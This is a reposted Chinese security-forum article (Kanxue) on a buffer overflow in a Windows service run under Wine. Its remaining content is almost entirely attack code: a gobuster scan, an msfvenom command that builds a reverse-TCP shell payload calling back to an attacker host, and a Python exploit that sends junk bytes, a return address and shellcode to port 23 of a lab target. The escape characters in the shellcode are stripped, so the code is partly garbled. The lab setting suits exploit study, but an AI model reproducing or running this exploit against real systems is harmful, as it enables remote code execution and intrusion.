本文为看雪论坛优秀文章
看雪论坛作者ID:WindyMan
gobuster dir -u http://192.168.56.12/student_attendance/ -t 50 -x .php,.html,.txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 403,404
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.100 LPORT=4444 -b 'x00x0ax4dx4fx5fx79x7ex7f' -f python
#!/usr/bin/python3import socket
buf=b''target_ip='192.168.56.12'
target_port=23
recv_buf=4096
junk = b'a' * 1902
ret_addr=b'xd0x12x50x62'
#nops=b'x90'*32 可选
buf += b"x33xc9x83xe9xafxe8xffxffxffxffxc0x5ex81"
buf += b"x76x0exe1xa8xa3x85x83xeexfcxe2xf4x1dx40"
buf += b"x21x85xe1xa8xc3x0cx04x99x63xe1x6axf8x93"
buf += b"x0exb3xa4x28xd7xf5x23xd1xadxeex1fxe9xa3"
buf += b"xd0x57x0fxb9x80xd4xa1xa9xc1x69x6cx88xe0"
buf += b"x6fx41x77xb3xffx28xd7xf1x23xe9xb9x6axe4"
buf += b"xb2xfdx02xe0xa2x54xb0x23xfaxa5xe0x7bx28"
buf += b"xccxf9x4bx99xccx6ax9cx28x84x37x99x5cx29"
buf += b"x20x67xaex84x26x90x43xf0x17xabxdex7dxda"
buf += b"xd5x87xf0x05xf0x28xddxc5xa9x70xe3x6axa4"
buf += b"xe8x0exb9xb4xa2x56x6axacx28x84x31x21xe7"
buf += b"xa1xc5xf3xf8xe4xb8xf2xf2x7ax01xf7xfcxdf"
buf += b"x6axbax48x08xbcxc0x90xb7xe1xa8xcbxf2x92"
buf += b"x9axfcxd1x89xe4xd4xa3xe6x57x76x3dx71xa9"
buf += b"xa3x85xc8x6cxf7xd5x89x81x23xeexe1x57x76"
buf += b"xd5xb1xf8xf3xc5xb1xe8xf3xedx0bxa7x7cx65"
buf += b"x1ex7dx34xefxe4xc0x63x2dxd9xccxcbx87xe1"
buf += b"xb9xffx0cx07xc2xb3xd3xb6xc0x3ax20x95xc9"
buf += b"x5cx50x64x68xd7x89x1exe6xabxf0x0dxc0x53"
buf += b"x30x43xfex5cx50x89xcbxcexe1xe1x21x40xd2"
buf += b"xb6xffx92x73x8bxbaxfaxd3x03x55xc5x42xa5"
buf += b"x8cx9fx84xe0x25xe7xa1xf1x6exa3xc1xb5xf8"
buf += b"xf5xd3xb7xeexf5xcbxb7xfexf0xd3x89xd1x6f"
buf += b"xbax67x57x76x0cx01xe6xf5xc3x1ex98xcbx8d"
buf += b"x66xb5xc3x7ax34x13x53x30x43xfexcbx23x74"
buf += b"x15x3ex7ax34x94xa5xf9xebx28x58x65x94xad"
buf += b"x18xc2xf2xdaxccxefxe1xfbx5cx50"
payload = b''payload += junk
payload += ret_addr
#payload += nops
payload += buf
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
clientSock.connect((target_ip,target_port))
data_from_srv = clientSock.recv(recv_buf)
print(f"Reply --> {data_from_srv}")
print(f"Sending --> {payload}")
clientSock.sendall(payload)
看雪ID:WindyMan
https://bbs.pediy.com/user-home-722051.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
本文始发于微信公众号(看雪学院):Linux下wine运行Windows服务的缓冲区溢出
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论